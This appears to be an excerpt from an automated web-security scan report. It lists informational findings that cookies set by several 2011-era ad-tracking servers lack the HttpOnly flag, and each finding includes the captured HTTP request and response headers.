The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.ingeniux.com/p.json?callback=_ate.ad.hpr&uid=4d97b40ad252fd37&url=http%3A%2F%2Fwww.ingeniux.com%2Fsolutions%2Fwebsite_optimization&1rvjqwy HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh38.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1302197723.1FE|1302197723.60|1302197723.66; psc=4; uid=4d97b40ad252fd37

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 332
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 09 Apr 2011 00:18:15 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 09 May 2011 00:18:15 GMT; Path=/
Set-Cookie: di=%7B%7D..1302308295.1FE|1302308295.60|1302197723.66; Domain=.addthis.com; Expires=Mon, 08-Apr-2013 00:18:15 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 09 Apr 2011 00:18:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 00:18:15 GMT
Connection: close

_ate.ad.hpr({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4d97b40ad252fd37","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d97b40ad252fd37&curl=http%3a%2f%2
...[SNIP]...
6.97. http://ds.addthis.com/red/psi/sites/www.marqui.com/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.marqui.com/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.marqui.com/p.json?callback=_ate.ad.hpr&uid=4d97b40ad252fd37&url=http%3A%2F%2Fwww.marqui.com%2Fcompany%2Fcontact-us%2F&ref=http%3A%2F%2Fwww.marqui.com%2F&18q07bs HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh38.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=1302308295.60|1302308295.1FE|1302197723.66; dt=X; psc=4; uid=4d97b40ad252fd37

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 321
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 09 Apr 2011 00:21:59 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 09 May 2011 00:21:59 GMT; Path=/
Set-Cookie: di=%7B%7D..1302308519.1FE|1302308519.60; Domain=.addthis.com; Expires=Mon, 08-Apr-2013 00:21:59 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 09 Apr 2011 00:21:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 00:21:59 GMT
Connection: close

_ate.ad.hpr({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4d97b40ad252fd37","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d97b40ad252fd37&curl=http%3a%2f%2
...[SNIP]...
6.98. http://h.zedo.com/init/0.4907234441488981/g.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h.zedo.com
Path:   /init/0.4907234441488981/g.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /init/0.4907234441488981/g.gif HTTP/1.1
Host: h.zedo.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/248038904/direct;wi.728;hi.90/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZCBC=1; FFgeo=2241452; ZEDOIDA=Ly@jTcGt89Y-7tVXMtikPSik~041111

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:41:19 GMT
Server: ZEDO 3G
Set-Cookie: FFgeo=2241452; path=/; EXPIRES=Tue, 10-Apr-12 16:41:19 GMT; DOMAIN=.zedo.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Length: 42
Expires: -1
Pragma: no-cache
Cache-Control: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;
6.99. http://h.zedo.com/init/0.6948210536502302/g.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h.zedo.com
Path:   /init/0.6948210536502302/g.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /init/0.6948210536502302/g.gif HTTP/1.1
Host: h.zedo.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/248038904/direct;wi.728;hi.90/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZCBC=1; FFgeo=2241452; ZEDOIDA=Ly@jTcGt89Y-7tVXMtikPSik~041111

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:41:19 GMT
Server: ZEDO 3G
Set-Cookie: FFgeo=2241452; path=/; EXPIRES=Tue, 10-Apr-12 16:41:19 GMT; DOMAIN=.zedo.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Length: 42
Expires: -1
Pragma: no-cache
Cache-Control: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;
6.100. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9ODImdGw9MTU3NjgwMCZkcF9pZD0yMg==&piggybackCookie=pcv:1|uid:4608069584519221037 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=&mpid=&fpid=-1&rnd=7441790688687410964&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:8663496762294337265; KRTBCOOKIE_22=488-pcv:1|uid:4608069584519221037; KRTBCOOKIE_107=1471-uid:bf0d68cb-2449-4e5d-8b20-461d8ec850c3; PUBRETARGET=403_1396394640.401_1396394640.78_1396402387.1985_1305685077.82_1396559211.571_1396770949

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:41:20 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=403_1396394640.401_1396394640.78_1396402387.1985_1305685077.82_1396559211.571_1396770949; domain=pubmatic.com; expires=Sun, 06-Apr-2014 07:55:49 GMT; path=/
Content-Length: 1
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html

6.101. http://insight.adsrvr.org/track/conv  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://insight.adsrvr.org
Path:   /track/conv

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /track/conv?pid=2ktjv7m&ct=0:ACQ_site&v=0&vf=USD&adv=7j9i29e&fmt=3 HTTP/1.1
Host: insight.adsrvr.org
Proxy-Connection: keep-alive
Referer: http://ad.adsrvr.org/container/7j9i29e.1.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Cache-Control: private,no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Sat, 09 Apr 2011 00:18:41 GMT
Location: //cm.g.doubleclick.net/pixel?nid=TheTradeDesk
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"
Pragma: no-cache
Server: Microsoft-IIS/7.0
Set-Cookie: TDID=93caf860-6015-49f5-b797-e053c6c1f790; domain=.adsrvr.org; expires=Mon, 09-Apr-2012 00:18:41 GMT; path=/
X-AspNet-Version: 4.0.30319
Connection: keep-alive
Content-Length: 75

<img src="//cm.g.doubleclick.net/pixel?nid=TheTradeDesk" height=1 width=1/>
6.102. http://js.revsci.net/gateway/gw.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=E05510 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPFJ0OBb3IQV+XT5RxDq2qIWAxW81lJ0QSlgYlQhAfV/yUINBw3cQgYrocUZKyvzimWAsuUtPsj5mWx+zsRJJJHGffRX0UbHd1GuLNHKym8P0LbSVFlz/vsh0oin7o3Bbz1tXhw1TpqAvMZ1v1Lv8NerqkTDVdntzlNMPA0y2boUy5Y7voYnl6yfgInYUDcW6SaAKQc8fmEXLMWnPd1UywCVDviQnU8+ot7CCucwAMHnPzp0i/Sn5tB+7puon3vUHjOAOCGmRh9dHzU6fIwRQmdiEhTO8yKU9t1bIy34gP5vFQ9MLGxzzqrLdQWtCrzaEs=; rtc_D3oY=MLsv7iUucA5nprADwxMUR9Sz0MEszwLosfaz5fWZ65hV2fUOBnLo+BWjQ4EZLeotOXo28EHvDL1pbOBARLmM/MYd6RgTq9u+iM7/hQBepPr9SkW1eU9LpSn2tzgwRP0c/xx5jIRX7BMLqY4BgQC03lxOEmvvtSk5ET4IMDzv8yWjLYK7pDAruXWuMrqWQYCGy8NcEmqwJlS1r3QCTBMPKlGt8h8jhoskQYAEg5VB6abCKt0ty7d4V0r5LMiHjJ1yDDxjo3fWHFdlT0J3x3vNTBOP3u4LdR/ixLPJ4yHO+zAfzaP4HygF1suDMBuT4oX+Q3ErH7vVwhv5PsadCEykM5nhDDFNysSgXBEG+twoDa14AcpRzAbhEsFenqXNxpvSYpqc3Iy2NCgIfu7mw81csoIeKwTlkp9olnajK1wOkRn/RbFuU1Ma+eqf2bJ54C9QYGm/4BYb5mYPHUYbSUBiWvzEkXm4bqgQDP0t5t9xesus2w==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv39VMJbiprpr7J1tGod15FBuRpIyJ6dZqZhUw+nHk3d0sCmth9F4Cl7qRejK7RvOrYuZa+0vYBwiIMKX/E0mdpCmvoLUl2YHQjZeohUyN6UXprd3rlGsVixsKGfgYQ0bdWzYKJsapdJwmWdxMo5sZ2nRFuDhx8AXR7DmKcoQRFlecApkJPC+u3n3686I+Vi5ZPGoYBe11HfBziB6cjAOYVOExDMYLF1NAwE+IlNzf2H6Kq/o6en9aRFaI/j3LilmUURretejbxQDDUN68VOiMZ+YoG8WZyc8n0bJJVoHkw8rEHDggJbCSah99UVldkPTSUMKvcr1KbW/YoH2g27Afb0DBw+MN7W4hu6mom2LtWDcG2/i87xWb/QHs8rQ7e4YHJs1yMtk3GU2o81V9WE9zXBXjfp7XwTd60Pe7TDhbOWZBPS/QFuKInp9jIlzHzvACAkEsOtPTAioCxFpYl/YpFXTnStwIctyMjqxB7F32SDYDFlmQpQl3JCsq3vZEF6sn/FpvSIqcFYsnT4D97UT6KjNy+xU1rd0CtPH9xCAL8HGhSFw6hZtbcczwjvddxSy4DU1B0DbdrKwnvdFRwbDAagVOecSfz1cCg6V1RQMN6vQ+DMUnvokoYNmRBw8V9VxAZfg1ddsH8SExc2GVT/Ry4BZYbNm8qT3ELGVQzuGjsHDNmTXzyyx697U7CTcYEzdqbqqwHhLd1DFK+c2B5qnY3VjlyFLzAjm3UaBjZw7q86bv/w04rftqOg7r5tvCdU+KnFFvpSaoeEBUZYzJfDE0dlpSiBD+qzJbDsp/ZNYqwqF1XZmbhKbb66OrAimvQXYWVRLJZ+JcK3BLMRLaiZ8x9KK1dBI9S5qDkPl55LwcFthf6z9Rt2MXvvFQy4GTbExbJqlengID88+rRS9sMTbIOnxluH5Ap7hBfn/tL4sJmFrxwmI6VHXfAmabLblPec/94JrT48pEEvkh3/4STgLq5e8APbXeD4naEo55AtZi4sWvit53t3awJRl852EYUpQwnZQIoGgm5pFaUTu/hk+EcJG/9E2Oh5hc71ocL0olCbdpQg+Bq1x4CdLNS1U/oo/BYEJaTaoyzy3IvUTCdGPuzsbZo4XYAzsjZWdXquo7he0n/eaHLsDYMfrGzGHTURWHbQdl8b4q8xw==; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 16:21:06 GMT; Path=/
Last-Modified: Mon, 11 Apr 2011 16:21:06 GMT
Cache-Control: max-age=3600, private
Expires: Mon, 11 Apr 2011 17:21:06 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:21:05 GMT
Content-Length: 5835

//Vermont-12.4.0-1133
var rsi_now= new Date();
var rsi_csid= 'E05510';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){this._rsiaa=Da;this._rsiba
...[SNIP]...
6.103. http://l.betrad.com/ct/0_0_0_0_0_624/us/0/1/0/0/0/0/1/242/141/0/pixel.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.betrad.com
Path:   /ct/0_0_0_0_0_624/us/0/1/0/0/0/0/1/242/141/0/pixel.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ct/0_0_0_0_0_624/us/0/1/0/0/0/0/1/242/141/0/pixel.gif?v=2&ttid=2&d=a.rfihub.com&m=5&o=1&r=0.20625745062716305 HTTP/1.1
Host: l.betrad.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tuuid=c97c97a9-3db3-478f-bd31-4a01094e6cd0

Response

HTTP/1.1 204 No Content
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=c97c97a9-3db3-478f-bd31-4a01094e6cd0; path=/; expires=Mon, 08 Apr 2013 12:35:37 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 0
Date: Sat, 09 Apr 2011 12:35:37 GMT

6.104. http://l.betrad.com/ct/0_0_0_0_179_1228/us/0/1/0/0/0/0/1/242/279/0/pixel.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.betrad.com
Path:   /ct/0_0_0_0_179_1228/us/0/1/0/0/0/0/1/242/279/0/pixel.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ct/0_0_0_0_179_1228/us/0/1/0/0/0/0/1/242/279/0/pixel.gif?v=2&ttid=2&d=a.rfihub.com&m=5&r=0.2290514805354178 HTTP/1.1
Host: l.betrad.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tuuid=c97c97a9-3db3-478f-bd31-4a01094e6cd0

Response

HTTP/1.1 204 No Content
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=c97c97a9-3db3-478f-bd31-4a01094e6cd0; path=/; expires=Mon, 08 Apr 2013 12:35:37 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 0
Date: Sat, 09 Apr 2011 12:35:37 GMT

6.105. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&betr=tc=1,99999,60740,60489,60515,60514,52615,53656,57130,52766,56988,60197,56969,52576,56835,57129,56732,56830,56768,53575,53615,57125,50213&guidm=1:16pfbut1d45iun&bnum=43223 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
